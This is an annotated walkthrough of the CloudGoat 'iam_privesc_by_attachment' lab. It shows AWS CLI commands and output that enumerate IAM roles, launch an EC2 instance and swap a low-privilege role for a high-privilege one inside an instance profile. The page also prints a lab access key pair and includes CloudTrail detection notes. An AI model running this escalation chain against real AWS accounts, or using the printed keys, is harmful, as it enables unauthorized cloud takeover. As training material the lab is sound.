iam_privesc_by_attachment

# Deploy
# Build the lab from the CloudGoat scenario directory.
% ./cloudgoat.py create scenarios/iam_privesc_by_attachment/
# start.txt holds the scenario outputs: the AWS account id and a long-term
# access key pair (AKIA... id plus secret) for the starting IAM user
# "kerrigan". Anyone who can read this file can act as that user, so it is a
# secret for as long as the scenario stays deployed.
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/iam_privesc_by_attachment_cgidc7g4el7tyy/start.txt
cloudgoat_output_aws_account_id = 287336331436
cloudgoat_output_kerrigan_access_key_id = AKIAUFZUUPCWNOKOCQ5F
cloudgoat_output_kerrigan_secret_key = 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
# Store the key pair above under a named CLI profile, so every later call
# states explicitly which identity it runs as.
% aws configure --profile kerrigan
# First call with the new profile (its output is not shown on this page).
% aws iam list-users --profile kerrigan

# Start
# Ask IAM which policies kerrigan has. Both calls below return AccessDenied:
# the user may not read its own inline or attached policies, so its effective
# permissions have to be inferred from which other API calls succeed.
# Detection note: denied IAM calls are recorded in CloudTrail with an
# AccessDenied error code; a run of them from one access key is a common
# sign of permission enumeration.
% aws iam list-user-policies --user-name kerrigan --profile kerrigan

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::287336331436:user/kerrigan is not authorized to perform: iam:ListUserPolicies on resource: user kerrigan

% aws iam list-attached-user-policies --user-name kerrigan --profile kerrigan

An error occurred (AccessDenied) when calling the ListAttachedUserPolicies operation: User: arn:aws:iam::287336331436:user/kerrigan is not authorized to perform: iam:ListAttachedUserPolicies on resource: user kerrigan

# Listing roles is allowed. The output shows two roles, "meek" and "mighty".
# Both trust only the EC2 service (ec2.amazonaws.com) for sts:AssumeRole, so
# neither can be assumed by a user directly; they are reachable only through
# an instance profile attached to an EC2 instance.
# list-roles returns the trust policy, not the permission policies, so the
# role names are the only hint here about which one is more privileged.
% aws iam list-roles --profile kerrigan
{
    "Roles": [
        {
            "Path": "/",
            "RoleName": "cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "RoleId": "AROAUFZUUPCWGE77S6ZF2",
            "Arn": "arn:aws:iam::287336331436:role/cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:22Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "RoleId": "AROAUFZUUPCWON6UAXZZR",
            "Arn": "arn:aws:iam::287336331436:role/cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:23Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        }
    ]
}

# Listing instance profiles is allowed too. The output shows a single profile
# that currently holds the meek role. An instance profile is the container EC2
# uses to hand a role to an instance, so whoever can change the role inside it
# decides what instances launched with that profile are allowed to do.
% aws iam list-instance-profiles --profile kerrigan
{
    "InstanceProfiles": [
        {
            "Path": "/",
            "InstanceProfileName": "cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "InstanceProfileId": "AIPAUFZUUPCWMZ3BMHXHP",
            "Arn": "arn:aws:iam::287336331436:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:28Z",
            "Roles": [
                {
                    "Path": "/",
                    "RoleName": "cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
                    "RoleId": "AROAUFZUUPCWGE77S6ZF2",
                    "Arn": "arn:aws:iam::287336331436:role/cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
                    "CreateDate": "2021-09-10T03:39:22Z",
                    "AssumeRolePolicyDocument": {
                        "Version": "2012-10-17",
                        "Statement": [
                            {
                                "Effect": "Allow",
                                "Principal": {
                                    "Service": "ec2.amazonaws.com"
                                },
                                "Action": "sts:AssumeRole"
                            }
                        ]
                    }
                }
            ]
        }
    ]
}

# Output is not shown on this page; presumably the subnet and security group
# ids used when launching the instance come from this call - confirm.
% aws ec2 describe-instances --profile kerrigan --region us-east-1

# Create key pair
# Creates an EC2 key pair literally named "scenario.pem" and redirects the
# private key (the KeyMaterial field) into ./scenario.pem. The redirection
# sits in the middle of the command; the shell applies it wherever it appears.
# The file is created with the shell's default umask, so on most systems it is
# readable by other local users until its mode is tightened (e.g. chmod 400),
# and ssh rejects a private key file that group or others can read.
% aws ec2 create-key-pair --key-name scenario.pem --query 'KeyMaterial' --output text > scenario.pem --region us-east-1 --profile kerrigan

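# Create Instance using key pair
# Launches a t2.micro as kerrigan with the scenario's instance profile attached
# and the key pair created earlier. Attaching an instance profile at launch
# needs iam:PassRole on the role inside it, in addition to ec2:RunInstances.
# At this point the profile still holds the meek role.
aws ec2 run-instances --image-id ami-0a313d6098716f372 \
--instance-type t2.micro \
--iam-instance-profile Arn=arn:aws:iam::287336331436:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--key-name scenario.pem \
--subnet-id subnet-005c5f0c7147a7076 \
--security-group-ids sg-0707a6096c22c9ebf \
--profile kerrigan \
--region us-east-1

# Swap the role inside the instance profile. A profile can hold only one role,
# so the meek role is removed before the mighty role is added. This pair of
# calls is the privilege escalation itself: the instance launched above is
# tied to the profile, not to a role, so it is expected to receive the mighty
# role's credentials once the change propagates.
# Defender notes: CloudTrail records both calls as IAM management events
# (RemoveRoleFromInstanceProfile, AddRoleToInstanceProfile). A non-admin
# principal swapping roles on a profile shortly after RunInstances or
# CreateKeyPair is worth alerting on. The chain is closed by not granting
# instance-profile write actions to principals that can launch instances, and
# by scoping iam:PassRole to specific role ARNs.
aws iam remove-role-from-instance-profile \
--instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy \
--profile kerrigan

aws iam add-role-to-instance-profile \
--instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy \
--profile kerrigan

# The key file was written through a plain redirect, so it carries
# umask-default permissions. Restrict it to owner read-only before use: ssh
# refuses private keys that group or others can read, and the key should not
# be readable by other local users in any case.
chmod 400 scenario.pem
ssh -i "scenario.pem" ubuntu@ec2-52-207-225-132.compute-1.amazonaws.com

# NOTE(review): unlike every other command on this page, this one has no
# --profile. Presumably it is run inside the SSH session with the instance
# role's credentials rather than locally as kerrigan - confirm. Run locally, it
# would use whatever default credentials the workstation has.
# The key pair named scenario.pem and the local key file still exist after
# this step; remove both when the lab is finished.
aws ec2 terminate-instances --instance-ids i-0d38448b97c0c4e63 --region us-east-1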
